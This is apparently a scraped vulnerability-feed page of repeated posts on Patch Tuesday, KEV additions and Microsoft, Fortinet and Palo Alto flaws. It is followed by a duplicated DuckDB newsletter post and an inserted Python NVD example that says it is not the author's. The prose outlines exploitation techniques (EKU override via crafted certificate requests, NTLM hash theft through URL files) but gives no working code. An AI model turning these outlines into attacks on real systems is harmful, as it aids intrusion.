CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-13T12:32:16
2 posts
1 repos
The bug is tracked as CVE-2024-47574, and it earned a 7.8 out of 10 CVSS severity rating. It affects FortiClientWindows version 7.4.0, 7.2.4 through 7.2.0, 7.0.12 through 7.0.0, and 6.4.10 through 6.4.0. Fortinet patched the hole on Tuesday. https://www.theregister.com/2024/11/14/fortinet_vpn_authentication_bypass_bug/
##Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-13T00:30:48
1 posts
1 repos
Happy #PatchTuesday from Google Chrome: Stable Channel Update for Desktop
Chrome 131.0.6778.69 (Linux) and 131.0.6778.69/.70 (Windows, Mac) bring 12 security fixes, 8 of which are externally reported. No mention of exploitation.
#vulnerability #google #chrome #chromium #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:31:01
1 posts
1 repos
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
#vulnerability #fortinet #fortianalyzer #fortiweb #fortios #fortiportal #cve #infosec #cybersecurity
##updated 2024-11-12T21:30:54
1 posts
1 repos
Additional Fortinet security advisories:
No mention of exploitation.
#Fortinet #PatchTuesday #CVE #vulnerability #infosec #cybersecurity
##updated 2024-11-12T21:30:53
1 posts
Happy #PatchTuesday from Fortinet:
Fortinet pisses me off because I have to check each individual CVSS score for the base, not the temporal. No mention of exploitation.
##updated 2024-11-12T18:31:06
3 posts
TrustedSec: EKUwu: Not just another AD CS ESC
The publicly disclosed zero-day CVE-2024-49019, (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability, appears to be the one mentioned in the 08 October 2024 blog post by TrustedSec. Dubbed "EKUwu," an attacker can craft a certificate signing request, or CSR, (using built-in default version 1 certificate templates) to include application policies that are preferred over the configured Extended Key Usage attributes specified in the template. The only requirement is enrollment rights, and it can be used to generate client authentication, certificate request agent, and codesigning certificates using the WebServer template.
According to the timeline, TrustedSec reported the vulnerability on 30 August and Microsoft Security Response Center responded on 28 September saying that "the default configuration was not vulnerable" but requested that they "hold off on publishing any details." UwU what's this? Cue the 08 October blog post disclosing the vulnerability and details.
h/t: @dreadpir8robots cc: @cR0w
#CVE_2024_49019 #zeroday #microsoft #EKUwu #cve #vulnerability
##Ref: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019
##Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities
#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:31:05
10 posts
1 repos
Microsoft has urgently patched two high-risk vulnerabilities actively targeted by attackers:
🔹 CVE-2024-43451 – Attackers can hijack user privileges by exposing NTLMv2 hash credentials, letting them authenticate as the user with a “pass the hash” attack.
🔹 CVE-2024-49039 – A Windows Task Scheduler flaw enabling attackers to escape AppContainer restrictions and gain elevated access.
⚠️ Immediate Action: Update your systems now to block these dangerous exploits!
##3rd Microsoft vuln this year (among the over a dozen over the years I'm tracking) of how a remote attacker can get a user's Windows password NT hashes without needing to be admin on the user's device. Your passwords need to be truly random...now!
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-43451
##CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
#CVE_2024_43451 #UAC_0194
https://www.clearskysec.com/0d-vulnerability-exploited-in-the_wild/
The vulnerability in question, CVE-2024-43451 (CVSS score: 6.5), refers to an NTLM hash disclosure spoofing vulnerability that could be exploited to steal a user's NTLMv2 hash. It was patched by Microsoft earlier this week. https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
##How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) https://www.helpnetsecurity.com/2024/11/14/cve-2024-43451-exploited/ #ClearSkyCyberSecurity #spearphishing #vulnerability #WindowsServer #Don'tmiss #Hotstuff #malware #Ukraine #Windows #News #CVE
##ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability
ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.
#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT
##Microsoft fixes actively exploited zero-days (CVE-2024-43451, CVE-2024-49039) https://www.helpnetsecurity.com/2024/11/12/cve-2024-43451-cve-2024-49039/ #MicrosoftDefender #ActiveDirectory #securityupdate #ImmersiveLabs #vulnerability #WindowsServer #PatchTuesday #TrendMicro #Don'tmiss #Microsoft #Hotstuff #OpenSSL #Tenable #Windows #Ivanti #0-day #News #CVE
##CVE ID: CVE-2024-43451
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43451 ; https://nvd.nist.gov/vuln/detail/CVE-2024-43451
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-43451
CISA: CISA Adds Five Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #knownexploitedvulnerabilitiescatalog #cisakev #vulnerability #cve #eitw #activeexploitation #infosec #cybersecurity
##updated 2024-11-12T18:31:00
7 posts
1 repos
##CVE-2024-49039 - Security Update Guide - Microsoft - Windows Task Scheduler Elevation of Privilege Vulnerability #SuggestedRead #devopsish https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49039
##CVE ID: CVE-2024-49039
Vendor: Microsoft
Product: Windows
Date Added: 2024-11-12
Vulnerability: Microsoft Windows Task Scheduler Privilege Escalation Vulnerability
Notes: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-49039 ; https://nvd.nist.gov/vuln/detail/CVE-2024-49039
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-49039
Some fairly interesting stuff for this #PatchTuesday!
Of particular note for me, a 9.9 in Azure CycleCloud (CVE-2024-43602), a Windows AppContainer escape (CVE-2024-49039), and a RCE in .NET/Visual Studio (CVE-2024-43498)? That one needs more detail.
https://www.zerodayinitiative.com/blog/2024/11/12/the-november-2024-security-update-review
##updated 2024-11-12T18:31:00
3 posts
1 repos
Microsoft Security Response Center (MSRC): CVE-2024-49040 (update)
MSRC temporarily paused the rollout of the update for CVE-2024-49040 (7.5 high, disclosed 12 November 2024) Microsoft Exchange Server Spoofing Vulnerability. According to the Exchange Team blog:
Known issues with this update
We are aware of customers having an issue with the Transport rules stopping periodically after this update is installed. Based on our initial investigation, this can happen to customers who use their own transport or DLP rules. If you are seeing this problem, you might have to uninstall the November SU until it is re-released.
We are continuing the investigation and are working on a permanent fix to address this issue. We will release it when ready. We have also paused the rollout of November 2024 SU to Windows / Microsoft Update. Customers who might not use Transport or DLP rules and did not run into the issue with rules, can continue using the November SU update.
#microsoft #CVE_2024_49040 #exchange #vulnerability #CVE #infosec #cybersecurity
##Takeaway from Solidlab security researcher Vsevolod Kokorin on CVE-2024-49040
https://www.bleepingcomputer.com/news/security/unpatched-microsoft-exchange-server-flaw-enables-spoofing-attacks/
##updated 2024-11-12T18:30:58
1 posts
@ryanaraine tweeted "👀 Interesting people reporting a very interesting bug 👀" over at the Bad Place™ and linked CVE-2024-43450 (7.5 high) Windows DNS Spoofing Vulnerability. The reporters are from "cnnic.cn" which is China Internet Network Information Center, affiliated with the Ministry of Industry and Information Technology.
I think he's implying that it's unusual for a PRC government institution affiliated with MIIT itself to report a widely impacting network vulnerability in a post-July 2021 “Regulations on the Management of Network Product Security Vulnerabilities” (RMSV). Maybe the attack complexity is too high to be worthwhile? CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
##updated 2024-11-08T21:34:54
1 posts
2 repos
We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2024-11-08T21:33:52
7 posts
2 repos
Palo Alto Expedition Missing Authentication Vulnerability (CVE-2024-5910) https://fortiguard.fortinet.com/threat-signal-report/5575
##CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild https://cyble.com/blog/cisa-finds-palo-alto-networks-cve-2024-5910-exploited-in-the-wild/ #Cybernews
##CISA Finds Palo Alto Networks’ CVE-2024-5910 Exploited in the Wild
The flaw is a missing authentication vulnerability that allows an attacker with network access to take over Palo Alto Expedition’s admin account and...
🔗️ [Cyble] https://link.is.it/85zu1w
##The vulnerability is tracked as CVE-2024-5910 and it was patched by Palo Alto Networks in July. https://www.securityweek.com/palo-alto-networks-expedition-vulnerability-exploited-in-attacks-cisa-warns/
##Critical Palo Alto Networks Expedition bug exploited (CVE-2024-5910) https://www.helpnetsecurity.com/2024/11/08/cve-2024-5910/ #PaloAltoNetworks #vulnerability #Horizon3.ai #Don'tmiss #Hotstuff #News #CVE #PoC
##CISA Alerts Fed Agencies of Active Exploitation of Palo Alto Networks’ CVE-2024-5910 https://thecyberexpress.com/cisa-alerts-of-cve-2024-5910-exploitation/ #ExpeditionVulnerability #paloaltonetworks #TheCyberExpress #CVE-2024-5910 #Vulnerability #CyberNews #PaloAlto
##updated 2024-11-08T18:31:57
1 posts
Lovense's Lush 2 'massage' toy getting its own CVE is hilarious
##updated 2024-11-08T13:55:32
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDB for this to work):
INSTALL gsheets FROM community;
LOAD gsheets;
Basic usage patterns include:
-- Read from a sheet
FROM read_gsheet('spreadsheet_url_or_id');

-- Write to a sheet
COPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;
CREATE PERSISTENT SECRET (
  TYPE gsheet,
  PROVIDER access_token,
  TOKEN 'yOUrToK3nH3re'
);
And, now we can look at the “schema”:
$ duckdb -json -c "
  LOAD gsheets;
  FROM read_gsheet(
    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
    sheet = 'Sheet1'
  )
  LIMIT 1" | jq
[
  {
    "Vendor": "Sophos",
    "Title": "Sophos SFOS SQL Injection Vulnerability",
    "CVE": "CVE-2020-12271",
    "CVSS": 9.8,
    "Date of NVD publication": "4/27/20",
    "Date of vendor advisory": "Unknown",
    "Used in ransomware attacks?": "Known",
    "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).",
    "Date added to KEV Catalog": "11/3/21",
    "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412",
    "Date of Known Exploitation": "Apr-20",
    "Threat actor": "Unknown",
    "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal",
    "Metasploit Module": "N",
    "GreyNoise (#of Malicious IPs Scanning)": 0.0,
    "Number of vulnerable devices": "?",
    "Number of impacted devices": "?",
    "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271"
  }
]
And, perform normal ops on it:
$ duckdb -table -c "
  LOAD gsheets;
  FROM read_gsheet(
    'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550',
    sheet='Sheet1'
  )
  SELECT Vendor, COUNT(Vendor) AS ct
  GROUP BY Vendor
  ORDER BY 2 DESC"
+---------------------+----+
| Vendor              | ct |
+---------------------+----+
| Cisco               | 72 |
| D-Link              | 19 |
| Ivanti              | 18 |
| Citrix              | 16 |
| Fortinet            | 13 |
| SonicWall           | 10 |
| Zyxel               |  9 |
| NETGEAR             |  8 |
| Juniper             |  6 |
| F5                  |  6 |
| PANW                |  5 |
| Sophos              |  5 |
| DrayTek             |  3 |
| Tenda               |  3 |
| TP-Link             |  2 |
| MikroTik            |  2 |
| Dasan               |  2 |
| Check Point         |  1 |
| D-Link and TRENDnet |  1 |
| Barracuda           |  1 |
| Netis               |  1 |
| FatPipe             |  1 |
| Arcadyan            |  1 |
| Sumavision          |  1 |
+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet; I have not debugged why, yet), so this might be a good project to PR into if you need some specific functionality that is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306 (for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432 (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
If you are a MySQL/MariaDB shop, this might be something to keep on the radar.
Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
Photo by Samson Andreea on Pexels.com
The DuckDB HTTP Client extension enables direct HTTP GET and POST requests from within DuckDB queries. After installing and loading via the community extensions repository, you can make HTTP requests that return results directly into DuckDB’s query processing pipeline.
By now, you should know how to install/load extensions:
INSTALL http_client FROM community;
LOAD http_client;
The extension provides two main functions: http_get() for GET requests and http_post() for POST requests with optional headers and parameters. The results are returned as structured data that can be further processed using DuckDB’s SQL capabilities.
The extension returns responses in a consistent format that includes:
The response data can be immediately parsed and transformed using DuckDB’s built-in JSON processing capabilities and integrated into larger analytical queries.
The README provides a practical example of this extension’s utility: its ability to interact with spatial data APIs. When combined with DuckDB’s spatial extension, you can fetch GeoJSON data via HTTP and directly process it as geometric objects. This enables seamless integration of remote spatial data sources into DuckDB analytical workflows.
We can show another one, though. Let’s say we want to use DuckDB to analyze a day’s worth of NVD CVE records.
We can grab all of the CVEs for one day and save a temp copy in memory as a table (this reduces the number of times we need to fetch from the API):
CREATE TABLE yesterday AS (
  WITH __req AS (
    SELECT http_get(
      'https://services.nvd.nist.gov/rest/json/cves/2.0/?pubStartDate=2024-11-08T00:00:00.000&pubEndDate=2024-11-08T23:59:59.000'
    ) AS res
  ),
  __res AS (
    SELECT UNNEST(
      from_json(((res->>'body')::JSON)->'vulnerabilities', '["json"]')
    ) AS cves
    FROM __req
  )
  FROM __res
);
We’ll look at that in a second, but be aware that some APIs paginate (NVD does at 2,000 records) and this extension won’t handle that, but you can work around it if you combine this method with some shell scripting.
What that query returns is an array of deeply nested JSON records:
FROM yesterday LIMIT 3;
┌─────────────────────────────────────────────────────────────────────────────┐
│                                    cves                                     │
│                                    json                                     │
├─────────────────────────────────────────────────────────────────────────────┤
│ {"cve":{"id":"CVE-2024-47072","sourceIdentifier":"security-advisories@gith… │
│ {"cve":{"id":"CVE-2024-51987","sourceIdentifier":"security-advisories@gith… │
│ {"cve":{"id":"CVE-2024-51998","sourceIdentifier":"security-advisories@gith… │
└─────────────────────────────────────────────────────────────────────────────┘
But DuckDB lets us work with JSON pretty seamlessly.
It looks like the NVD contractors are milking their contract for all it’s worth:
FROM yesterday
SELECT
  cves->>'cve'->>'vulnStatus' AS vulnStatus,
  COUNT() AS ct,
  ROUND(COUNT() * 100.0 / SUM(COUNT()) OVER (), 2) AS pct
GROUP BY ALL;
┌─────────────────────┬───────┬────────┐
│     vulnStatus      │  ct   │  pct   │
│       varchar       │ int64 │ double │
├─────────────────────┼───────┼────────┤
│ Awaiting Analysis   │    83 │  65.87 │
│ Received            │    34 │  26.98 │
│ Undergoing Analysis │     9 │   7.14 │
└─────────────────────┴───────┴────────┘
You can add headers, and use getenv(var) to fill in things like API keys.
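The same pipeline in plain Python, added here as an example (not code from the Daily Drop or from the DuckDB http_client extension): it follows NVD's startIndex/resultsPerPage/totalResults cursor, which the post notes the extension does not handle, flattens the nested records, and reproduces the vulnStatus tally. The two sample pages, their CVE IDs and the NVD_API_KEY variable name are constructed for this example; the NVD field names and the apiKey header are the real API's.

```python
"""Page through the NVD CVE API 2.0 and tally vulnStatus, in plain Python.

Added example, not code from the Daily Drop or the DuckDB http_client
extension. NVD's pagination fields (startIndex, resultsPerPage, totalResults),
the `apiKey` header and the cvssMetricV31 layout are the real API's; the
sample pages, CVE IDs and the NVD_API_KEY variable name are constructed.
"""
from __future__ import annotations

import json
import os
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, Iterator

NVD_URL = "https://services.nvd.nist.gov/rest/json/cves/2.0/"

# A fetcher takes the query parameters and returns the parsed JSON body.
Fetcher = Callable[[dict], dict]

# Constructed sample: three records split across two pages, the way NVD
# returns a window that exceeds one page (the real page size is 2,000).
SAMPLE_PAGES = {
    0: {
        "resultsPerPage": 2, "startIndex": 0, "totalResults": 3,
        "vulnerabilities": [
            {"cve": {"id": "CVE-0000-0001", "vulnStatus": "Awaiting Analysis",
                     "metrics": {"cvssMetricV31": [{"cvssData": {"baseScore": 9.8}}]}}},
            {"cve": {"id": "CVE-0000-0002", "vulnStatus": "Received"}},
        ],
    },
    2: {
        "resultsPerPage": 1, "startIndex": 2, "totalResults": 3,
        "vulnerabilities": [
            {"cve": {"id": "CVE-0000-0003", "vulnStatus": "Awaiting Analysis"}},
        ],
    },
}


def fake_fetch(params: dict) -> dict:
    """Offline stand-in for an HTTP GET against NVD_URL."""
    return SAMPLE_PAGES[int(params.get("startIndex", 0))]


def nvd_headers() -> dict:
    """Optional API key, read from the environment (the post's getenv() tip),
    never hard-coded into the query text."""
    key = os.environ.get("NVD_API_KEY")
    return {"apiKey": key} if key else {}


def http_fetch(params: dict) -> dict:
    """Live fetcher: GET NVD_URL with the given query parameters."""
    req = urllib.request.Request(NVD_URL + "?" + urllib.parse.urlencode(params),
                                 headers=nvd_headers())
    with urllib.request.urlopen(req, timeout=60) as resp:
        return json.load(resp)


def iter_cves(fetch: Fetcher, pub_start: str, pub_end: str) -> Iterator[dict]:
    """Yield every `cve` object in the publication window, advancing
    startIndex until totalResults has been consumed."""
    start = 0
    while True:
        page = fetch({"pubStartDate": pub_start, "pubEndDate": pub_end,
                      "startIndex": start})
        vulns = page.get("vulnerabilities", [])
        for item in vulns:
            yield item["cve"]
        start += len(vulns)
        # Stop at the end of the result set, or on an empty page (defensive:
        # never spin on a malformed response).
        if not vulns or start >= page.get("totalResults", 0):
            break


def flatten(cves: Iterable[dict]) -> list[dict]:
    """Pull id, vulnStatus and the CVSS v3.1 base score out of each nested
    record; records still awaiting analysis carry no metrics yet."""
    rows = []
    for c in cves:
        v31 = c.get("metrics", {}).get("cvssMetricV31", [])
        score = v31[0]["cvssData"]["baseScore"] if v31 else None
        rows.append({"id": c["id"], "vulnStatus": c.get("vulnStatus"),
                     "baseScore": score})
    return rows


def status_breakdown(cves: Iterable[dict]) -> list[tuple[str, int, float]]:
    """Same tally as the post's GROUP BY vulnStatus query: (status, count, pct)."""
    counts = Counter(c.get("vulnStatus", "Unknown") for c in cves)
    total = sum(counts.values())
    return [(status, n, round(n * 100.0 / total, 2) if total else 0.0)
            for status, n in counts.most_common()]


if __name__ == "__main__":
    window = ("2024-11-08T00:00:00.000", "2024-11-08T23:59:59.000")
    # Swap fake_fetch for http_fetch to run against the live API.
    for row in flatten(iter_cves(fake_fetch, *window)):
        print(row)
    for status, n, pct in status_breakdown(iter_cves(fake_fetch, *window)):
        print(f"{status:<22}{n:>5}{pct:>8}")
```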
This is a super fun extension to play with!
FIN
Remember, you can follow and interact with the full text of The Daily Drop’s free posts on Mastodon via @dailydrop.hrbrmstr.dev@dailydrop.hrbrmstr.dev
☮️
updated 2024-11-08T13:55:27
1 posts
Quacking In The [g]Sheets; My🦆Server; Feet-First 🦆 DB (a.k.a. “DuckDB HTTP Client Extension”)
My day outside of Reno started early, Friday, and we were chased by black helicopters (not joking), so — as expected — no Friday normal Drop.
But things are QUACKING in DuckDB land, and I just had to get a Bonus 🦆 Drop out about them before more hiking this weekend.
TL;DR
(This is an AI-generated summary of today’s Drop using Ollama + llama 3.2 and a custom Modelfile.)
Quacking In The [g]Sheets
The DuckDB GSheets extension (GH) enables seamless integration between DuckDB’s analytical capabilities and Google Sheets, bridging a critical gap between collaborative spreadsheet workflows and robust data analysis.
The extension provides straightforward (though fairly basic, for now) SQL syntax for both reading and writing Google Sheets data. You can query sheets using either full URLs or spreadsheet IDs, with options to specify sheet names and handle header rows. Authentication can be handled through browser-based OAuth or via Google API access tokens.
If you work in an environment where domain experts collaborate with datascience/analysis teams, Google Sheets (et al.) often serves as an accessible interface for non-technical team members to maintain and update data that feeds into analytical workflows. For example, product managers can maintain feature flags, marketing teams can update campaign metadata, and operations teams can manage configuration data – all through the familiar spreadsheet interface rather than dealing with JSON, YAML, or raw text files.
Setting up the extension requires installing it from the community repository (you need to be on a fairly recent release of DuckDb for this to work):
INSTALL gsheets FROM community;LOAD gsheets;
Basic usage patterns include:
-- Read from a sheetFROM read_gsheet('spreadsheet_url_or_id');-- Write to a sheetCOPY table_name TO 'spreadsheet_url_or_id' (FORMAT gsheet);
The section header image is from this gsheet which is (my public copy of) a “Database of network device CVEs” provided by Sophos from a five-year massively cool (but evil) hack of dozens of corporations around the globe. It is possible this sheet might be updated regularly, especially the “GreyNoise (#of Malicious IPs Scanning)
” column (that’s my $WORK place). If that is the case it may make more sense to access it directly than to have some process to download it somewhere regularly.
I made a perma-copy of my OAuth’d access token:
LOAD gsheets;CREATE PERSISTENT SECRET ( TYPE gsheet, PROVIDER access_token, TOKEN 'yOUrToK3nH3re');
And, now we can look at the “schema”:
$ duckdb -json -c " LOAD gsheets; FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet = 'Sheet1' ) LIMIT 1" | jq[ { "Vendor": "Sophos", "Title": "Sophos SFOS SQL Injection Vulnerability", "CVE": "CVE-2020-12271", "CVSS": 9.8, "Date of NVD publication": "4/27/20", "Date of vendor advisory": "Unknown", "Used in ransomware attacks?": "Known", "Summary": "Sophos Firewall operating system (SFOS) firmware contains a SQL injection vulnerability when configured with either the administration (HTTPS) service or the User Portal is exposed on the WAN zone. Successful exploitation may cause remote code execution to exfiltrate usernames and hashed passwords for the local device admin(s), portal admins, and user accounts used for remote access (but not external Active Directory or LDAP passwords).", "Date added to KEV Catalog": "11/3/21", "Vendor Advisory": "https://community.sophos.com/kb/en-us/135412", "Date of Known Exploitation": "Apr-20", "Threat actor": "Unknown", "Targets": "Telecommunication,Construction,Transportation,Education,Manufacturing,Auto,Airline,Pharmaceuticals,Retail,Insurance,Legal", "Metasploit Module": "N", "GreyNoise (#of Malicious IPs Scanning)": 0.0, "Number of vulnerable devices": "?", "Number of impacted devices": "?", "GreyNoise Link": "https://viz.greynoise.io/query/%0A%20%20CVE-2020-12271" }]
And, perform normal ops on it:
$ duckdb -table -c "LOAD gsheets;FROM read_gsheet( 'https://docs.google.com/spreadsheets/d/1TbBX1YkZ4GED1qU7Owcp2AIiRhcGzLEAFCEopq7smMg/edit?gid=1482976550#gid=1482976550', sheet='Sheet1')SELECT Vendor, COUNT(Vendor) AS ctGROUP BY VendorORDER BY 2 DESC"+---------------------+----+| Vendor | ct |+---------------------+----+| Cisco | 72 || D-Link | 19 || Ivanti | 18 || Citrix | 16 || Fortinet | 13 || SonicWall | 10 || Zyxel | 9 || NETGEAR | 8 || Juniper | 6 || F5 | 6 || PANW | 5 || Sophos | 5 || DrayTek | 3 || Tenda | 3 || TP-Link | 2 || MikroTik | 2 || Dasan | 2 || Check Point | 1 || D-Link and TRENDnet | 1 || Barracuda | 1 || Netis | 1 || FatPipe | 1 || Arcadyan | 1 || Sumavision | 1 |+---------------------+----+
The extension has some notable constraints to consider:
These limitations aside, the DuckDB GSheets extension will will (eventually) provide a robust bridge between collaborative data maintenance and analytical processing, making it easier for organizations to maintain their data workflows across technical and non-technical team members.
The code is very readable, but the extension is also a tad buggy at the moment (you may not always be able to get to a particular sheet, I have not debugged why, yet); so, this might be a good project to PR into if you have some specific functionality you need, but is presently missing, like support for a subset of the bonkers number of parameters you can use when reading CSV files in DuckDB.
My🦆Server
MyDuck Server is a nascent bridge between MySQL and DuckDB with a goal of enabling high-performance analytics while maintaining MySQL compatibility. It functions by storing data in DuckDB’s OLAP-optimized format while presenting a MySQL-compatible interface, allowing queries to execute [up to 1,000x] faster than traditional MySQL configurations.
The system operates through dual interfaces — a MySQL wire protocol on port 13306
(for traditional MySQL-style queries) and a PostgreSQL-compatible interface on port 15432
. (for direct DuckDB SQL execution).
I’m including this mostly for visibility, since I do not run MySQL/MariaDB, and the README — while a tad verbose — is also not super helpful in terms of real examples.
